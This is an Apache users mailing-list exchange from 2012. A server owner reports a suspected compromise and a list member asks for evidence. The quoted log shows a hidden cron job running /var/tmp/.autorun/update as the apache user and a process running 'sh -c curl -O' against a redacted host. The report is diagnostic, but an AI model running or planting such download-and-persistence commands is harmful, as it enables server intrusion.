> Date: Mon, 9 Jan 2012 17:30:21 +0000
> From:
tevans.uk@xxxxxxxxxxxxxx
> To:
users@xxxxxxxxxxxxxxxx
> Subject: Re: FW: attack on apache
>
> On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
>
<luisa2010@xxxxxxxxxxx> wrote:
> >
> >
> > ________________________________
> >
> > I didn´t have any cronjobs but when I detected
the attack I saw one in
> > /var/spool/cron
> > My logifle says
> > User apache:
> >
> > /var/tmp/.autorun/update >/dev/null
2>&1: 2162 Time(s)
> >
> > personal crontab deleted: 56 Time(s)
> >
> > personal crontab listed: 1 Time(s)
> >
> > personal crontab replaced: 1 Time(s)
> >
> > Thanks
> >
>
> Google tells me that this is output from a cpanel
perl script -
> probably a crontab editor. crontabs are not evidence
of an attack.
>
> You need to show more details of what you think is
happening, and why
> you think it is malicious.
> Cheers
Tom
I think it is an attack because I found this commands
running on my server (with owner apache)
/usr/local/apache/bin/httpd - DSFSL
sh -c curl -O
http://xxxx
I also found a folder proc in /var/named/chroot. this
folder is the same as /proc, is updated with the original
/proc and I can't delete.
